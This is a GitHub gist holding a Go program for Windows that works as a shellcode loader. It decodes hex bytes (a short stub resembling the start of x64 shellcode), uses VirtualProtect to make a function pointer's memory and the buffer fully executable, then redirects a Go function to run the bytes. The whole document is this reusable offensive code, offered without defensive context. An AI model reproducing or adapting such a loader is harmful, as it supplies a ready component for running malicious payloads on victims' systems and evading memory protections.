Last active
July 3, 2021 22:29
-
-
Save affix/5a7ac386ebf0d0e0bdc03c11fff068fe to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "encoding/hex" | |
| "fmt" | |
| "syscall" | |
| "unsafe" | |
| ) | |
| var procVirtualProtect = syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect") | |
| func VirtualProtect(lpAddress unsafe.Pointer, dwSize uintptr, flNewProtect uint32, lpflOldProtect unsafe.Pointer) bool { | |
| ret, _, _ := procVirtualProtect.Call( | |
| uintptr(lpAddress), | |
| uintptr(dwSize), | |
| uintptr(flNewProtect), | |
| uintptr(lpflOldProtect)) | |
| return ret > 0 | |
| } | |
| func main() { | |
| sc, err := hex.DecodeString("fc4883e4f0e8c000000041") | |
| if err != nil { | |
| fmt.Println(err) | |
| } | |
| f := func() {} | |
| var oldfperms uint32 | |
| if !VirtualProtect( | |
| unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f))), // The pointer to our f() function (lpAddress) | |
| unsafe.Sizeof(uintptr(0)), // The size of the access protection attributes to be changed (dwSize) | |
| uint32(0x40), // Our new memory access permission 0x40 FULL ACCESS | |
| unsafe.Pointer(&oldfperms)) { // Store our old permissions in the oldfperms var | |
| panic("Call to VirtualProtect failed!") | |
| } | |
| **(**uintptr)(unsafe.Pointer(&f)) = *(*uintptr)(unsafe.Pointer(&sc)) | |
| var oldshellcodeperms uint32 | |
| if !VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&sc))), uintptr(len(sc)), uint32(0x40), unsafe.Pointer(&oldshellcodeperms)) { | |
| panic("Call to VirtualProtect failed!") | |
| } | |
| f() | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment